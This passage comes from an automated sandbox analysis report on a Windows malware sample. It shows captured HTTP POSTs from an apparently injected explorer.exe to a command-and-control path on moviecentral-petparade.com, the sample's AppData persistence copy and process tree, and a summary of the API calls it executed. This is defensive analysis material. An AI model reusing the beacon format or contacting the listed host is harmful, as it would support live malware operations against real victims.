Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	50011	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:46.112869024 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:46.990211964 CET	794	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYVi%2B1Img4nwHJtJwLeCUf1PXRr9Jw%2BZt3lZwN%2FqEtajobWVodzvYulUWA9mlmqFrs4a8MzP67MsqjGsVKBtZhqQkPIbW0tg3R8dhJSSOeyB%2Bqw7%2BPC9AyNctXRJw3%2B92hzQPTmy1TS%2B%2ByHKEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa8d8d9beb06-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	50012	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:48.643749952 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:49.516539097 CET	782	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfrcozFnc8m7922vXh4rgW7uM%2B6LdUcFP92mfNKzumf21f%2FZLNh179QXSeBOFT%2B%2BNTThY7QDLBLLWMjD9Y8OhCU8SVFoeNotq0IF8wz%2FYfzJ8pKdglpd763jERQEZWxpIN2yHVc2DH2EokQ6GA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fa9d4e0c2e79-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	50013	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:51.039572954 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:51.934885025 CET	779	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1Iy9gFpdnk8%2BD%2F51QLfaNuPkW7xQVyVnILwSSaN9kS3DDiuH3zQJ9wgYs7kT64geiUP8VqW0Z0tIV4FweGvEziTF7DDcFn9osTD10K97kmD4L0tymMkG8EUIT9E%2F5EP7DuXOUHL6OfIJp2xvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3faac6cdf7d54-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Oct 31, 2024 14:26:51.934895992 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	50014	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:53.567806005 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:54.439513922 CET	785	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2oa%2Fv%2Fy89BMhWmVjCbBOcnZVxg7rPqMU%2BN%2F8Jls8rJ%2F8vcgPt8p34ZlJt%2FIsy5BquVU1VhJzixWf6EgKt7GUnB%2B69Zlpkga2cbtMccSABziBJlerrTCZNxEGuxUPptWsgV608lmGvI%2F6x%2BNSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fabc1c1ae7fb-DFW server-timing: cfL4;desc="?proto=TCP&rtt=2185&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a Data Ascii: 1
Oct 31, 2024 14:26:54.439558983 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	50015	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:55.958731890 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:56.939987898 CET	788	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EfwyuieNpbcg76x%2BmAzp6%2Bz0V2NW9dVu1CiUxCyhIc%2BpOi2ATprAON76b27%2FA7h6BgvH%2BzttjGR5lO004vzH15JdBNo3TQR9ITTG17t8GeRxstx9y05BM6AkMKXPFNgbPLMcqKvVgrrmPGFmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3facb29613583-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	50016	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:58.567997932 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:59.340718985 CET	782	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUNMniKe5yrBuIO%2Fpu%2BGyWhpkvFJ4CHctYEbQ87xIYxP9aScMlKgmvWYArE45%2FCN9AIjMAiW3VDgrJXjN9nFIKP56JmcFQXV9jvD34Uix868%2Fv7ztzHrSEbihEO%2B4lqd9Fr3pKdBWvtNjOecaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fadb9966478a-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	50017	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:27:00.849298000 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:27:01.600033045 CET	790	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:27:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tA1R2zq0uRNBK%2B2xTlzGHLaRj26gnuB7s5oI%2F%2BQjd2QqoeNGSty2W0pEcLLLv7DTt8eijPPYjTNAH3LQQhFD7ReasarcKHBPJY%2BsFfwDKnyIq8ocae9qvW6I7EizWrrESE9C1EZVVVBPz%2B%2BWyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fae9af3c6c31-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	50018	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:27:03.273612022 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:27:04.183170080 CET	779	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:27:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvrhtDg66CSqTgXOMB%2BUipw8wF9s3ZmqCud10J9sXqOZm%2FNwGGTF9EP%2BOb1%2F9y8NLhnVSJXWAc81Gr3jaRqF9qUcau5KDRYD1w5VKAFqt92Adb2FCHKsoXvXtLZqPA2zpPqGtTShDYjKLYUlSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3faf8ec256b07-DFW server-timing: cfL4;desc="?proto=TCP&rtt=933&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	50019	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:27:05.694255114 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:27:06.558212042 CET	784	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:27:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFarOdzAD9lDL65eGR9VeaM4xU8LGXrsE7eBdKgRG041BpGQ2elxjj9CNO%2BuMkEKC1BxBdDnIro90UEM6MzD1GYRk%2FzCNuAfeUirqZDv3x5NO1pxpFkOSFVYrrCwKLlXk477g5kXuZdNlhq1%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3fb07f9dc2c9e-DFW server-timing: cfL4;desc="?proto=TCP&rtt=2244&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	09:25:00
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe"
Imagebase:	0x400000
File size:	13'599'640 bytes
MD5 hash:	C52C721E095A91BB0D589DD0206D5F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1348154278.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.1376105942.000000000568C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:25:03
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\comp.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\comp.exe
Imagebase:	0xf0000
File size:	23'552 bytes
MD5 hash:	712EF348F7032AA1C80D24600BA5452D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:25:03
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:25:16
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
Imagebase:	0x400000
File size:	13'599'640 bytes
MD5 hash:	C52C721E095A91BB0D589DD0206D5F3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:25:16
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
Imagebase:	0x400000
File size:	13'599'640 bytes
MD5 hash:	C52C721E095A91BB0D589DD0206D5F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:25:18
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\comp.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\comp.exe
Imagebase:	0xf0000
File size:	23'552 bytes
MD5 hash:	712EF348F7032AA1C80D24600BA5452D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:25:18
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:25:19
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\comp.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\comp.exe
Imagebase:	0xf0000
File size:	23'552 bytes
MD5 hash:	712EF348F7032AA1C80D24600BA5452D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:25:19
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:25:23
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	09:25:29
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:25:35
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.6%
Total number of Nodes:	142
Total number of Limit Nodes:	7

Executed Functions

Function 0063251D Relevance: 1.6, APIs: 1, Instructions: 123
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006324BD: GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED

NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 00632581

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID: AllocGlobalInformationQuerySystem
String ID:
API String ID: 3737350999-0
Opcode ID: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
Instruction ID: e927c1356fe4f02aca1b3b3252597500f30b78b6b1ccaa5a6689106d069b00d4
Opcode Fuzzy Hash: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
Instruction Fuzzy Hash: 7C51FFB5D0020AEFCB04CF98C8A1AEEB7B6FF49300F108599E915A7341D735AE41CBA5

Function 00632C3D Relevance: 4.0, APIs: 2, Instructions: 995
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006324BD: GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED

Part of subcall function 00631A2D: LoadLibraryW.KERNELBASE(?), ref: 00631A5E

VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 00633812
VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 00633845

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID: ProtectVirtual$AllocGlobalLibraryLoad
String ID:
API String ID: 2510009449-0
Opcode ID: b2f67e5c1deada5e11ff38754e35feaca63e07875fc6d6034ab12c462bdc80f3
Instruction ID: f8ecd0ee32df52de45be3ee3de65d06197aa54cbc33c33621ba615f2593e3ccc
Opcode Fuzzy Hash: b2f67e5c1deada5e11ff38754e35feaca63e07875fc6d6034ab12c462bdc80f3
Instruction Fuzzy Hash: 4592B7B5E00218EFDB54DF98C991EEEB7B6BF88300F148199E509AB341D631AE41CF94

Function 00633A4D Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J*c, xrefs: 00633B1F, 00633B28, 00633B55

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID:
String ID: J*c
API String ID: 0-966536654
Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
Instruction ID: 138c1e0c22fea212c8999007eefdc6166b41c463725099b238a90c11c38a07a7
Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
Instruction Fuzzy Hash: FB91DA75D04219EFCB08CF98D890AEEFBB6BF88310F148159E515AB351D734AA45CFA4

Function 00631DFD Relevance: 3.1, APIs: 2, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00631E1F

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
Instruction ID: 2b29a393c4a5116fc6a778d721da35c4eca03a53666dfea594c6023595a03fca
Opcode Fuzzy Hash: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
Instruction Fuzzy Hash: 6531A075A00108FFCB14DF98C891F9EB7B5EF49710F20C198E9159B395D631AE42DB90

Function 006323ED Relevance: 3.0, APIs: 2, Instructions: 50
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0063240F
WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 0063243D

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

